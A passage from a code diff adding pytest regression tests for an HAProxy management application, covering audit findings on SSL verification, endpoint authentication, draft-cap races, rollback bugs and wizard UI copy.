assert if_line != -1 and idx_line != -1 and log_line != -1
# Order: if -> logger.info (last line inside if) -> CREATE INDEX (outside if)
assert if_line < log_line < idx_line, (
"R16-2 regression: CREATE INDEX for acme_order_events_order_id "
"appears to live INSIDE the `if not exists:` block. Hoist it "
"out so existing tables also get the index on next startup."
)
def test_wizard_drafts_indexes_hoisted_out_of_if_not_exists():
"""Same invariant for wizard_drafts.expires_at / user_type indexes."""
from pathlib import Path
src = (
Path(__file__).resolve().parent.parent
/ "database"
/ "migrations.py"
).read_text()
start = src.find("async def ensure_wizard_drafts_table")
end = src.find("async def ", start + 10) # next async def after this one
assert start != -1
func_body = src[start:end] if end != -1 else src[start:]
idx_line = func_body.find("CREATE INDEX IF NOT EXISTS idx_wizard_drafts_expires_at")
if_line = func_body.find("if not exists:")
log_line = func_body.find('logger.info("Created wizard_drafts table")')
assert if_line != -1 and idx_line != -1 and log_line != -1
assert if_line < log_line < idx_line, (
"R16-2 regression: CREATE INDEX for wizard_drafts_expires_at "
"appears to live INSIDE the `if not exists:` block."
)
+182
View File
@@ -0,0 +1,182 @@
"""v1.5.0 R18 audit findings — regression tests.
Five non-trivial bugs surfaced during the R18 deep audit. Each is
covered with a dedicated assertion below so a future refactor can't
silently regress them.
Findings (audit summary):
R18-#1 (CRITICAL): `ssl_verify` was persisted to DB and forwarded by
the wizard but never rendered into the HAProxy bind line — covered
by `tests/test_haproxy_config_ssl_verify.py`.
R18-#2 (Major UX): Sidebar `selectedKeys` was tied to raw
`location.pathname`. Visiting `/proxied-hosts/new` (legacy v1.5.0
bookmark) or `/quick-setup` (R17 bookmark) rendered the wizard
correctly but the menu showed NO active highlight, making the
sidebar feel disconnected.
R18-#3 (Major data): Cluster swap on Step 0 left stale
`ssl.ssl_certificate_id` and per-server `ssl_certificate_id` values
in the form. Either the operator landed on a "(invalid)" Select or
a wrong cert id flowed into the submit payload and got rejected
server-side with a generic 400.
R18-#4 (UI/Pydantic mismatch): Pydantic `ServerStep.ssl_min_ver`
accepted TLSv1.0..1.3 but the wizard Select only offered 1.2/1.3
— drafts containing the legacy versions could not be edited via UI.
R18-#5 (Label semantics): Per-server `ssl_certificate_id` was
labelled "Client cert (mTLS to server)" — semantically wrong. The
field maps to HAProxy's `ca-file` which is for VERIFYING the
upstream server cert, NOT for HAProxy presenting a client cert.
"""
import re
from pathlib import Path
import pytest
_FRONT = Path(__file__).resolve().parent.parent.parent / "frontend" / "src"
_APP_JS = _FRONT / "App.js"
_WIZ = _FRONT / "components" / "SiteWizard.js"
def _read(p: Path) -> str:
if not p.exists():
pytest.skip(f"frontend tree not mounted at {p}")
return p.read_text()
# ----------- R18-#2: legacy alias selectedKey normalization -----------
def test_selected_key_normalizes_v15_legacy_aliases():
src = _read(_APP_JS)
assert re.search(
r"path\s*===\s*'/proxied-hosts/new'\s*\|\|\s*path\s*===\s*'/quick-setup'",
src,
), (
"R18-#2 regression: selectedKey no longer normalizes the v1.5.0 "
"/proxied-hosts/new and R17 /quick-setup aliases to /sites/new — "
"sidebar highlight will be missing on those legacy URLs"
)
assert re.search(
r"path\s*===\s*'/proxied-hosts/drafts'\s*\|\|\s*path\s*===\s*'/quick-setup/drafts'",
src,
), (
"R18-#2 regression: drafts aliases no longer normalized for "
"selectedKey — sidebar highlight missing on /proxied-hosts/drafts "
"and /quick-setup/drafts"
)
# ----------- R18-#3: cluster change clears stale cert IDs -----------
def test_cluster_change_clears_stale_cert_ids():
src = _read(_WIZ)
# The previous-cluster ref is the marker.
assert "prevClusterRef" in src, (
"R18-#3 regression: prevClusterRef no longer present — cluster "
"swap will not clear stale ssl.ssl_certificate_id"
)
# And both targets must be cleared.
assert "ssl_certificate_id: undefined" in src, (
"R18-#3 regression: ssl_certificate_id no longer cleared on "
"cluster change"
)
assert "servers" in src and "map" in src, (
"R18-#3 regression: per-server ssl_certificate_id clear pass "
"appears to be missing"
)
# ----------- R18-#4: per-server TLS literal coverage -----------
def test_legacy_tls_versions_not_offered_in_wizard_ui():
"""R18c round 10 reverses R18-#4: the wizard MUST NOT offer
TLSv1.0 / TLSv1.1 in any TLS min/max Select.
Background: R18 originally added TLSv1.0/1.1 entries so an old draft
targeting a legacy upstream could "round-trip" through the wizard.
The Pydantic models (ServerStep at backend/models/site_wizard.py:103
and SSLChoice at :354) however reject those values per RFC 8996, so
a user picking the legacy entries got a 422 at submit time after
completing five wizard steps. R18c round 10 (M1) drops the legacy
options from the UI to align with the API contract — both the
per-server Selects AND the HTTPS frontend listener Selects.
This test is the canonical regression guard for that decision.
"""
src = _read(_WIZ)
legacy_v10 = src.count('Option value="TLSv1.0"')
legacy_v11 = src.count('Option value="TLSv1.1"')
assert legacy_v10 == 0, (
f"R18c-#33 regression: TLSv1.0 still listed {legacy_v10} time(s) "
"in SiteWizard.js. The Pydantic models reject TLSv1.0 — see "
"ServerStep.reject_server_ca_bundle_without_ssl and "
"SSLChoice.reject_legacy_tls_versions in models/site_wizard.py."
)
assert legacy_v11 == 0, (
f"R18c-#33 regression: TLSv1.1 still listed {legacy_v11} time(s) "
"in SiteWizard.js. Same root cause as TLSv1.0 above."
)
# ----------- R18-#5: server cert label semantics -----------
def test_server_cert_label_uses_ca_bundle_terminology():
"""The HAProxy `ca-file` directive verifies the UPSTREAM server's
cert. Labelling the field 'Client cert (mTLS to server)' suggests
HAProxy presents a cert (would be `crt`, not `ca-file`) — wrong
semantics."""
src = _read(_WIZ)
assert "CA bundle for upstream verification" in src, (
"R18-#5 regression: server-side cert Select no longer labelled "
"as a CA bundle — confusing semantics for operators"
)
# And the misleading label must be gone.
assert 'label="Client cert (mTLS to server)"' not in src, (
"R18-#5 regression: misleading 'Client cert (mTLS to server)' "
"label reappeared"
)
def test_server_cert_required_when_verify_required():
"""When `ssl_verify === 'required'` HAProxy demands a CA bundle —
surface the dependency in the form rules so the operator can't
submit a half-configured payload."""
src = _read(_WIZ)
assert "ssl_verify is \"required\"" in src or "verify is \"required\"" in src or "A CA bundle is required" in src, (
"R18-#5 regression: missing 'ca-file required when verify=required' "
"form rule on the per-server cert Select"
)
# ----------- R18 misc: copy hygiene -----------
def test_drafts_409_message_uses_new_terminology():
src = (
Path(__file__).resolve().parent.parent / "routers" / "site_wizard.py"
).read_text()
assert "'Site Drafts'" in src, (
"R18 copy regression: 409 error message still references the "
"old 'Wizard Drafts' page name"
)
assert "'Wizard Drafts'" not in src, (
"R18 copy regression: stale 'Wizard Drafts' page name remains "
"in the 409 error message"
)
def test_letsencrypt_account_docstring_updated():
src = (
Path(__file__).resolve().parent.parent / "routers" / "letsencrypt.py"
).read_text()
assert "'New Site'" in src or '"New Site"' in src or "New Site" in src, (
"R18 copy regression: list_accounts docstring still uses the "
"old 'New Proxied Host' wizard name"
)
@@ -0,0 +1,232 @@
"""v1.5.0 R18 audit ROUND 2 — concurrency, rollback, multi-tenant fixes.
Findings discovered during the second-round audit:
R18-#6 (CRITICAL): `entity_snapshot.rollback_entity_from_snapshot`
treated `old_values={}` as missing because empty dicts are falsy
in Python. Wizard's bulk_snapshots always emit `"old_values": {}`
for CREATE entries — so EVERY wizard CREATE rollback silently
no-op'd. Rejected wizard PENDING versions left orphan entities.
R18-#7 (HIGH): `GET /api/ssl/certificates` was anonymous-readable.
Any unauthenticated client could enumerate cert metadata across
every cluster, breaking the multi-tenant guarantee enforced on
every other SSL endpoint.
R18-#8 (HIGH): `cluster.py::reject_all_pending_changes` did not
track `ssl_certificate` snapshots in `bulk_import_entity_ids`. A
rejected wizard upload-mode flow left an orphan `ssl_certificates`
row + on-disk PEM material.
R18-#9 (Major): `wizard_drafts` cap (50/user) was COUNT-then-INSERT,
not transactional. Two parallel saves both observing count=49
could both insert, exceeding the cap. Fix wraps both queries in a
transaction and takes a per-user `pg_advisory_xact_lock`.
R18-#10 (UX): `Form.useWatch(['ssl','mode'])` returns `undefined`
on first render. `acmeBlocksDraft = sslMode === 'acme'` evaluated
to `false` during hydration so the "Save as PENDING" button
flashed enabled for resumed ACME drafts; users could click it and
hit M22's 422 rejection. Fix gates `undefined` as also-blocked.
"""
import re
from pathlib import Path
import pytest
_REPO = Path(__file__).resolve().parent.parent
_FRONT = _REPO.parent / "frontend" / "src"
# ----------------- R18-#6: entity_snapshot CREATE rollback -----------------
def test_entity_snapshot_create_no_longer_gated_by_old_values_truthiness():
"""The pre-R18 guard `if not all([..., old_values]):` rejected
`old_values={}`. After R18 the CREATE branch must run with empty
old_values; only UPDATE/UPDATE_RESTORE/DELETE require old_values
to be present."""
src = (_REPO / "utils" / "entity_snapshot.py").read_text()
# Guard must NOT include old_values in the unconditional `not all`
# check anymore.
bad_guard = re.search(
r"if\s+not\s+all\(\s*\[\s*entity_type\s*,\s*entity_id\s*,\s*operation\s*,\s*old_values\s*\]\s*\)",
src,
)
assert not bad_guard, (
"R18-#6 regression: the rollback guard still includes "
"old_values in `not all([...])` — wizard CREATE snapshots will "
"silently no-op again"
)
# And the new conditional guard for UPDATE/DELETE must exist.
assert re.search(
r'if\s+operation\s+in\s+\(\s*"UPDATE",\s*"UPDATE_RESTORE",\s*"DELETE"\s*\)\s+and\s+not\s+old_values',
src,
), (
"R18-#6 regression: missing the new conditional old_values "
"guard for UPDATE/DELETE operations"
)
# ----------------- R18-#7: SSL list endpoint authentication -----------------
def test_ssl_list_endpoint_requires_authorization_header():
"""The list endpoint must accept an `authorization: str = Header(None)`
parameter and call `get_current_user_from_token` so it cannot be
enumerated anonymously."""
src = (_REPO / "routers" / "ssl.py").read_text()
# Find the get_ssl_certificates function signature.
sig_match = re.search(
r"async\s+def\s+get_ssl_certificates\s*\((.*?)\)\s*:",
src,
re.DOTALL,
)
assert sig_match, "R18-#7 regression: get_ssl_certificates signature not found"
sig = sig_match.group(1)
assert "authorization" in sig and "Header" in sig, (
"R18-#7 regression: get_ssl_certificates no longer accepts "
"an Authorization header — endpoint is anonymously readable"
)
# Body must call the authenticator. Locate the function body up to
# the next `@router` or end-of-file.
body_start = sig_match.end()
body_end = src.find("@router", body_start)
body = src[body_start: body_end if body_end != -1 else len(src)]
assert "get_current_user_from_token(authorization)" in body, (
"R18-#7 regression: get_ssl_certificates does not call "
"get_current_user_from_token — token presence is unenforced"
)
def test_ssl_list_endpoint_validates_cluster_access_when_filtered():
"""When the caller scopes to a specific cluster, the endpoint must
call `validate_user_cluster_access` so a user without access to
cluster B cannot enumerate cluster B's certs."""
src = (_REPO / "routers" / "ssl.py").read_text()
sig_match = re.search(
r"async\s+def\s+get_ssl_certificates\s*\(.*?\)\s*:",
src,
re.DOTALL,
)
body_start = sig_match.end()
body_end = src.find("@router", body_start)
body = src[body_start: body_end if body_end != -1 else len(src)]
assert "validate_user_cluster_access" in body, (
"R18-#7 regression: get_ssl_certificates no longer "
"validates cluster access — cross-tenant cert enumeration "
"is possible again"
)
# ----------------- R18-#8: SSL cert in reject reconciliation -----------------
def test_reject_tracks_ssl_certificate_snapshots_for_force_delete():
"""`bulk_import_entity_ids` must include `ssl_certificates` and
the entity_type==='ssl_certificate' branch must append into it.
Without this the wizard's upload-mode SSL row leaks on reject."""
src = (_REPO / "routers" / "cluster.py").read_text()
assert '"ssl_certificates": []' in src, (
"R18-#8 regression: bulk_import_entity_ids no longer "
"initialises 'ssl_certificates' bucket"
)
assert re.search(
r'entity_type\s*==\s*"ssl_certificate"\s*:\s*\n\s*#[^\n]*\n(?:\s*#[^\n]*\n)*\s*bulk_import_entity_ids\["ssl_certificates"\]\.append',
src,
), (
"R18-#8 regression: ssl_certificate entity_type branch no "
"longer pushes into the ssl_certificates list"
)
def test_reject_force_deletes_orphan_ssl_certificates():
"""The force-delete fallback must run a DELETE against
`ssl_certificates` when rollback verification still finds rows."""
src = (_REPO / "routers" / "cluster.py").read_text()
assert re.search(
r'DELETE\s+FROM\s+ssl_certificates\s+WHERE\s+id\s*=\s*ANY\(\$1\)',
src,
), (
"R18-#8 regression: reject force-delete fallback no longer "
"DELETEs ssl_certificates rows tracked in bulk_snapshots"
)
# ----------------- R18-#9: draft cap race -----------------
def test_drafts_cap_uses_advisory_lock_in_transaction():
"""The COUNT and INSERT must be wrapped in a transaction with a
per-user advisory lock so two parallel saves serialise rather
than both observing count=49."""
src = (_REPO / "routers" / "site_wizard.py").read_text()
# We need: async with conn.transaction(): ... pg_advisory_xact_lock(...)
assert "pg_advisory_xact_lock" in src, (
"R18-#9 regression: drafts cap no longer takes a per-user "
"advisory lock — count-then-insert race reintroduced"
)
# The advisory lock must be inside an async-with conn.transaction()
# block, before the COUNT.
snippet = re.search(
r"async with conn\.transaction\(\):.*?pg_advisory_xact_lock.*?SELECT COUNT\(\*\).*?FROM wizard_drafts",
src,
re.DOTALL,
)
assert snippet, (
"R18-#9 regression: advisory lock is not held in the same "
"transaction as the COUNT/INSERT pair"
)
# ----------------- R18-#10: ACME draft hydration UX gate -----------------
def test_acme_blocks_draft_treats_undefined_as_blocked():
"""SUPERSEDED by Phase K Phase D (Bulgu #6).
R18-#10 originally guarded the "Save as PENDING" button against
sslMode flash during ACME-draft hydration. Phase K Phase D
removed the dual-button UI (Create as PENDING + Create & Apply)
in favour of a single Create button whose semantics are derived
inside `handleSubmit`:
effectiveApply = sslMode === 'acme'
There is no longer a PENDING-only button to flash, so the
flash-mitigation is no longer needed. The behavioural
guarantee survives:
* sslMode='acme' → handleSubmit forces apply_immediately=true,
independent of any button.
* sslMode=undefined (mid-hydration) → handleSubmit's
`effectiveApply = sslMode === 'acme'` evaluates to false,
but the form-level rules block submit until the operator
completes the SSL step (covered by Pydantic + the dry-run
validation card on Step 4).
This test is kept as documentation of the prior contract and
re-pins the new contract: `handleSubmit` must read sslMode
via `values.ssl?.mode` (the post-validate snapshot).
"""
src = (_FRONT / "components" / "SiteWizard.js")
if not src.exists():
pytest.skip("frontend tree not mounted")
body = src.read_text()
# Phase K Phase D: assert handleSubmit derives effectiveApply
# from values.ssl?.mode rather than from an external acmeBlocksDraft
# boolean.
assert "values.ssl?.mode" in body, (
"Phase K Phase D regression: handleSubmit no longer reads "
"the SSL mode from the validated payload (values.ssl?.mode). "
"Without that read, the ACME → apply_immediately=true forcing "
"is broken and the operator can submit a payload that the "
"backend M22 validator will reject with a 422."
)
assert "sslModeAtSubmit === 'acme'" in body, (
"Phase K Phase D regression: handleSubmit no longer special-"
"cases sslMode='acme' to force apply_immediately=true. The "
"ACME flow will once again fail the backend M22 validator "
"with an opaque 422."
)
@@ -0,0 +1,139 @@
"""v1.5.0 R18 audit ROUND 3 — broader system fixes.
Findings discovered during the third-round audit:
R18-#11 (UX/data): Deleting a cluster left every operator's saved
Site Drafts orphaned: `wizard_drafts.payload->>'cluster_id'`
pointed at a non-existent cluster, breaking Resume until the 30d
TTL pruned them. Cluster delete now cascades a JSONB-path-based
DELETE on `wizard_drafts`.
R18-#12 (Drift): Manual `BackendConfig` and `BackendConfigUpdate`
accepted leading-underscore names. The agent's reverse-sync filter
`_should_sync_backend` silently dropped any such row, producing
silent control-plane drift between DB and on-disk haproxy.cfg.
Pydantic `validator('name')` now rejects the prefix at API entry,
matching the wizard's pre-existing constraint.
R18-#13 (DX): Swagger `/api/docs` listed wizard endpoints under
"Proxied Host Wizard". External integrators skimming the docs
couldn't find them after the Sites rebrand. Tag is now
"Sites (New Site Wizard)".
"""
import re
from pathlib import Path
import pytest
import importlib
_REPO = Path(__file__).resolve().parent.parent
# ----------------- R18-#11: cluster delete cascades drafts -----------------
def test_cluster_delete_prunes_wizard_drafts_referencing_cluster():
"""The cluster delete handler must DELETE every wizard_drafts row
whose payload's `cluster_id` JSON path matches the deleted cluster.
Without this Resume on those drafts surfaces a stale cluster_id
that no longer exists in `haproxy_clusters`."""
src = (_REPO / "routers" / "cluster.py").read_text()
# Look for the JSONB-path DELETE inside the delete_cluster
# transaction. The numeric-cast regex `~ '^[0-9]+$'` is the
# safety guard so non-numeric payloads don't blow up the cast.
# Phase I: the wizard_type filter is now a dual-value IN-list so
# both pre-rebrand (`proxied_host`) and post-rebrand (`site`)
# drafts get cleaned up when their target cluster is deleted.
# Match either the legacy single-value form OR the post-Phase-I
# IN-list form so this pin survives across the rebrand window.
assert re.search(
r"DELETE\s+FROM\s+wizard_drafts\s+WHERE\s+wizard_type\s+IN\s*\(\s*'site'\s*,\s*'proxied_host'\s*\)",
src,
) or re.search(
r"DELETE\s+FROM\s+wizard_drafts\s+WHERE\s+wizard_type\s*=\s*'proxied_host'",
src,
), (
"R18-#11 regression: cluster delete no longer prunes "
"wizard_drafts referencing the deleted cluster (neither the "
"pre-Phase-I single-value form nor the post-Phase-I dual-"
"value IN-list form is present)"
)
assert "(payload->>'cluster_id')::int" in src, (
"R18-#11 regression: missing JSONB path cast for cluster_id "
"in the wizard_drafts cleanup query"
)
assert "~ '^[0-9]+$'" in src, (
"R18-#11 regression: missing numeric-only safety guard before "
"the int cast — non-numeric payloads will raise"
)
# ----------------- R18-#12: manual backend rejects `_` prefix -----------------
def test_manual_backend_create_rejects_leading_underscore():
from models.backend import BackendConfig
with pytest.raises(Exception) as exc:
BackendConfig(name="_foo", cluster_id=1)
assert "underscore" in str(exc.value).lower() or "_" in str(exc.value), (
"R18-#12 regression: BackendConfig no longer rejects leading "
"underscore — manual API accepts a name the agent will silently "
"drop on reverse-sync"
)
def test_manual_backend_update_rejects_leading_underscore_rename():
from models.backend import BackendConfigUpdate
with pytest.raises(Exception) as exc:
BackendConfigUpdate(name="_renamed_to_system_thing")
assert "_" in str(exc.value), (
"R18-#12 regression: BackendConfigUpdate no longer rejects "
"rename to a leading-underscore name"
)
def test_manual_backend_create_accepts_normal_name():
"""Belt-and-braces: ensure the new validator does not over-reject."""
from models.backend import BackendConfig
# No exception should be raised.
BackendConfig(name="my_app_backend", cluster_id=1)
# ----------------- R18-#13: OpenAPI tag rebrand -----------------
def test_site_wizard_router_tag_uses_sites_terminology():
src = (_REPO / "routers" / "site_wizard.py").read_text()
# Old tag must be gone, new tag must be present.
assert '"Proxied Host Wizard"' not in src, (
"R18-#13 regression: stale 'Proxied Host Wizard' OpenAPI tag "
"still present"
)
assert '"Sites (New Site Wizard)"' in src, (
"R18-#13 regression: OpenAPI tag no longer rebranded to "
"'Sites (New Site Wizard)'"
)
# ----------------- R18-#14: entity_snapshot module doc polish -----------------
def test_entity_snapshot_module_doc_is_english():
"""The historical Turkish/English mix in the module docstring
looked unpolished for an enterprise codebase. Round 3 polished it.
Lock that down — nobody should re-introduce a Turkish phrase here."""
src = (_REPO / "utils" / "entity_snapshot.py").read_text()
# Cheap sentinel — the previous Turkish prose contained "Bu modül"
# and "güvenli başlangıç". Both must be gone from the module
# docstring (the very first triple-quoted block).
head = src[: src.find("import json")]
assert "Bu modül" not in head, (
"R18-#14 regression: Turkish phrase 'Bu modül' reappeared in "
"the module docstring"
)
assert "güvenli başlangıç" not in head, (
"R18-#14 regression: Turkish phrase 'güvenli başlangıç' "
"reappeared in the module docstring"
)
@@ -0,0 +1,200 @@
"""v1.5.0 R18b round 1 audit fixes — regression tests.
Findings discovered during R18b round 1:
R18b-#1 (Cross-route consistency): GET /api/frontends returned
`ssl_verify` masked as "optional" when the DB row was NULL. Edit
forms then sent the displayed value back, silently flipping
operator intent ("omit verify directive") to ("verify optional").
Now the API returns NULL verbatim; the HAProxy generator already
treats NULL as "omit", so round-trip is correct.
R18b-#2 (Preview parity): /api/proxied-hosts/preview's `would_create`
only echoed name/address/port for servers and bind tuple for
frontends. The actual create persisted ssl_verify, per-server
ssl_certificate_id, TLS min/max, HSTS shape, etc. — preview did
not match create. `would_create` now includes the same fields.
R18b-#2.1 (Preview HSTS bug — discovered round 2): the new HSTS
block read from `body.frontend.hsts_*` (which doesn't exist on
FrontendStep). HSTS is on `SSLChoice` (`body.ssl.hsts_*`); fix
was to flip the source.
R18b-#3 (Apply-failed UX): the "Created but Apply Failed" Modal
showed a generic message and dropped `apply_result.error` on the
floor. Operator had no way to learn why apply failed without
digging into Apply Changes. Modal now surfaces the error string.
R18b-#4 (Stale drafts list): wizard saves are append-only
(each save inserts a new row). A second tab editing the "same"
draft surface would diverge silently. Drafts page now refetches
on visibilitychange / window focus.
R18b-#5 (Default mismatch): FrontendConfig.ssl_verify defaulted to
"optional". When the FrontendManagement edit form cleared the
Select, the cleared value was dropped from the JSON payload, and
Pydantic re-applied "optional" — exactly the behaviour the clear
was meant to undo. Default is now None.
"""
import re
from pathlib import Path
import pytest
_REPO = Path(__file__).resolve().parent.parent
_FRONT = _REPO.parent / "frontend" / "src"
# ----------------- R18b-#1: ssl_verify NULL preserved -----------------
def test_get_frontends_returns_ssl_verify_verbatim():
src = (_REPO / "routers" / "frontend.py").read_text()
# The dangerous masking pattern must be gone…
assert 'f.get("ssl_verify", "optional")' not in src, (
"R18b-#1 regression: GET /api/frontends still masks NULL "
"ssl_verify to 'optional' — edit form will silently switch "
"verify directive on save"
)
# …and the verbatim form must remain.
assert 'f.get("ssl_verify")' in src, (
"R18b-#1 regression: GET /api/frontends no longer returns "
"ssl_verify verbatim from the DB row"
)
# ----------------- R18b-#5: FrontendConfig default -----------------
def test_frontend_config_default_ssl_verify_is_none():
"""Pydantic default must be None so omitted fields don't silently
switch a cleared verify directive back to 'optional'."""
from models.frontend import FrontendConfig
cfg = FrontendConfig(name="x", bind_port=80)
assert cfg.ssl_verify is None, (
"R18b-#5 regression: FrontendConfig.ssl_verify default is no "
f"longer None — got {cfg.ssl_verify!r}"
)
def test_frontend_management_initial_value_is_undefined():
src = (_FRONT / "components" / "FrontendManagement.js")
if not src.exists():
pytest.skip("frontend tree not mounted")
body = src.read_text()
assert "ssl_verify: 'optional'" not in body, (
"R18b-#5 regression: FrontendManagement initialValues still "
"hard-codes 'optional' for ssl_verify"
)
assert "ssl_verify: undefined" in body, (
"R18b-#5 regression: FrontendManagement initialValues no longer "
"marks ssl_verify as undefined (backend default = None)"
)
def test_bulk_import_no_longer_defaults_ssl_verify_to_optional():
src = (_REPO / "routers" / "config.py").read_text()
# The legacy default with a fallback to "optional" must be gone.
assert 'frontend_data.get("ssl_verify", "optional")' not in src, (
"R18b-#5 regression: bulk-config-import still defaults missing "
"ssl_verify to 'optional' — round-trip on import/export skews"
)
# ----------------- R18b-#2: preview parity -----------------
def test_preview_would_create_includes_ssl_verify_and_server_fields():
src = (_REPO / "routers" / "site_wizard.py").read_text()
# Locate the would_create block.
assert '"would_create"' in src
# Server-level fields parity.
server_fields = [
'"ssl_enabled": s.ssl_enabled',
'"ssl_verify": s.ssl_verify',
'"ssl_certificate_id": s.ssl_certificate_id',
'"ssl_min_ver": s.ssl_min_ver',
'"ssl_max_ver": s.ssl_max_ver',
]
for fld in server_fields:
assert fld in src, (
f"R18b-#2 regression: preview server entry no longer "
f"echoes {fld!r}"
)
# HTTPS frontend-level fields parity.
https_fields = [
'"ssl_alpn": body.ssl.ssl_alpn',
'"ssl_min_ver": body.ssl.ssl_min_ver',
'"ssl_strict_sni": body.ssl.ssl_strict_sni',
'"ssl_verify": body.ssl.ssl_verify',
'"ssl_certificate_id": body.ssl.ssl_certificate_id',
]
for fld in https_fields:
assert fld in src, (
f"R18b-#2 regression: preview frontend_https entry no "
f"longer echoes {fld!r}"
)
def test_preview_hsts_block_reads_from_ssl_not_frontend():
"""R18b round 2 fix — HSTS lives on SSLChoice, not FrontendStep.
The wrong source produced an always-empty HSTS preview."""
src = (_REPO / "routers" / "site_wizard.py").read_text()
# Find the hsts dict in the would_create context.
hsts_block_match = re.search(
r'"hsts":\s*\{[^}]*\}',
src,
re.DOTALL,
)
assert hsts_block_match, "R18b-#2.1 regression: preview hsts block missing"
block = hsts_block_match.group(0)
assert 'body.ssl' in block, (
"R18b-#2.1 regression: preview hsts block no longer reads "
"from body.ssl — falls back to a model that has no hsts_* "
"attrs and produces an always-empty HSTS preview"
)
assert 'body.frontend' not in block, (
"R18b-#2.1 regression: preview hsts block still reads from "
"body.frontend — FrontendStep has no hsts_* attrs"
)
# ----------------- R18b-#3: apply_result error surfaced -----------------
def test_wizard_apply_failed_modal_shows_apply_result():
src = (_FRONT / "components" / "SiteWizard.js")
if not src.exists():
pytest.skip("frontend tree not mounted")
body = src.read_text()
# The handler must extract apply_result from the response.
assert "apply_result" in body, (
"R18b-#3 regression: wizard create handler no longer reads "
"apply_result from the API response"
)
# And the Modal content must reference apply_result error.
assert "apply_result?.error" in body or "apply_result.error" in body, (
"R18b-#3 regression: 'Created but Apply Failed' Modal no "
"longer surfaces the actual apply error to the operator"
)
# ----------------- R18b-#4: drafts visibilitychange refetch -----------------
def test_drafts_refetches_on_visibility_change():
src = (_FRONT / "components" / "SiteDrafts.js")
if not src.exists():
pytest.skip("frontend tree not mounted")
body = src.read_text()
assert "visibilitychange" in body, (
"R18b-#4 regression: SiteDrafts no longer refetches on "
"tab visibility change — stale list when the same operator "
"edits drafts in another tab"
)
# Cleanup must remove the listener too.
assert "removeEventListener('visibilitychange'" in body, (
"R18b-#4 regression: SiteDrafts visibilitychange "
"listener not cleaned up — memory leak risk on remount"
)
@@ -0,0 +1,144 @@
"""v1.5.0 R18b round 3 audit fixes — regression tests.
Findings discovered during R18b round 3 (production hazards):
R18b-#7 (UniqueViolationError mapping): two operators racing the
same wizard host name, OR an active-only pre-flight check that
misses a soft-deleted (is_active=FALSE) row, hit the UNIQUE
(name, cluster_id) constraint inside the create transaction.
Pre-fix that bubbled up as 500 Internal Server Error with no
operator-actionable detail. Now we map asyncpg
UniqueViolationError to 409 with a precise hint.
R18b-#8 (Resume with deleted cert): wizard hydration from a
sessionStorage draft can carry an `ssl.ssl_certificate_id` (or
per-server `ssl_certificate_id`) pointing at a cert that was
deleted via SSL Management since the draft was saved. Pre-fix
the Select rendered the orphan id as an empty option and the
operator had no signal — submit then 400'd at FK validation.
Now we surface a single warning toast and clear the dangling
field whenever existingCerts refresh.
R18b-#9 (Drafts corrupt payload guard): a malformed payload (e.g.
`payload.domains` not an array, or `payload.cluster_id` a list)
threw inside an Ant Design Table column render, blanking the
entire drafts page. Now each render is defensive against
non-conforming JSONB.
"""
import re
from pathlib import Path
import pytest
_REPO = Path(__file__).resolve().parent.parent
_FRONT = _REPO.parent / "frontend" / "src"
# ----------------- R18b-#7: UniqueViolationError → 409 -----------------
def test_site_wizard_create_imports_unique_violation_error():
src = (_REPO / "routers" / "site_wizard.py").read_text()
# The import block may evolve to include other asyncpg exceptions
# (R18b round 4 added ForeignKeyViolationError). Match the symbol
# rather than a fixed-shape import line.
assert "UniqueViolationError" in src and "asyncpg.exceptions" in src, (
"R18b-#7 regression: proxied_host router no longer imports "
"UniqueViolationError — TOCTOU name conflicts will fall "
"through to a generic 500"
)
def test_site_wizard_create_maps_unique_violation_to_409():
src = (_REPO / "routers" / "site_wizard.py").read_text()
# Look for the catch + raise pattern.
assert "except UniqueViolationError" in src, (
"R18b-#7 regression: create endpoint no longer catches "
"UniqueViolationError"
)
# The detail must mention a concrete next step.
assert (
"already exists" in src
and "Pick a different" in src
), (
"R18b-#7 regression: 409 detail copy no longer guides the "
"operator to a concrete remedy"
)
# Verify it's actually raising HTTPException(409).
catch_block = src[src.find("except UniqueViolationError"):]
catch_block = catch_block[:catch_block.find("except Exception as e:")]
assert "status_code=409" in catch_block, (
"R18b-#7 regression: UniqueViolationError handler no longer "
"raises HTTP 409"
)
def test_site_wizard_create_distinguishes_backend_vs_frontend_unique_violation():
"""The UNIQUE(name, cluster_id) constraint can fire on either the
`backends` or the `frontends` table. The 409 detail should tell
the operator which entity is in conflict so they know which name
to change. Pre-R18b the message was undifferentiated."""
src = (_REPO / "routers" / "site_wizard.py").read_text()
catch_block = src[src.find("except UniqueViolationError"):]
catch_block = catch_block[:catch_block.find("except Exception as e:")]
assert "backends_name_cluster_id_key" in catch_block, (
"R18b-#7 regression: handler no longer special-cases the "
"backends UNIQUE constraint name"
)
assert "frontends_name_cluster_id_key" in catch_block, (
"R18b-#7 regression: handler no longer special-cases the "
"frontends UNIQUE constraint name"
)
# ----------------- R18b-#8: deleted-cert hydration warning -----------------
def test_wizard_warns_and_clears_orphan_ssl_certificate_id():
src = (_FRONT / "components" / "SiteWizard.js")
if not src.exists():
pytest.skip("frontend tree not mounted")
body = src.read_text()
# The orphan-detect effect must exist.
assert "orphanWarnedRef" in body, (
"R18b-#8 regression: wizard no longer tracks orphan-cert warnings"
)
# It must check both the HTTPS frontend and per-server slots.
assert "cur.ssl.ssl_certificate_id" in body or "ssl?.ssl_certificate_id" in body, (
"R18b-#8 regression: wizard no longer checks HTTPS frontend "
"ssl_certificate_id for orphan state"
)
assert "s.ssl_certificate_id" in body, (
"R18b-#8 regression: wizard no longer checks per-server "
"ssl_certificate_id for orphan state"
)
# And clears the dangling fields.
assert "form.setFieldsValue(updates)" in body, (
"R18b-#8 regression: wizard no longer clears orphan cert IDs "
"from the form"
)
# ----------------- R18b-#9: drafts table defensive render -----------------
def test_drafts_table_guards_non_array_domains():
src = (_FRONT / "components" / "SiteDrafts.js")
if not src.exists():
pytest.skip("frontend tree not mounted")
body = src.read_text()
assert "Array.isArray(raw) ? raw : []" in body, (
"R18b-#9 regression: drafts table 'Domains' column no longer "
"guards against a non-array payload — corrupt JSONB will "
"blank the whole page"
)
# The bare `r.payload?.domains || []` pattern was the pre-fix
# form. It looks safe at a glance but `[].slice` only exists on
# an Array; a string `"a,b"` would silently slice to `"a,b"`.
bad_pattern = re.compile(r"r\.payload\?\.domains\s*\|\|\s*\[\]")
assert not bad_pattern.search(body), (
"R18b-#9 regression: drafts table still uses the unsafe "
"`r.payload?.domains || []` fallback that admits string "
"payloads and silently slices them"
)
@@ -0,0 +1,199 @@
"""v1.5.0 R18b round 4 audit fixes — security & data integrity tests.
Findings discovered during R18b round 4:
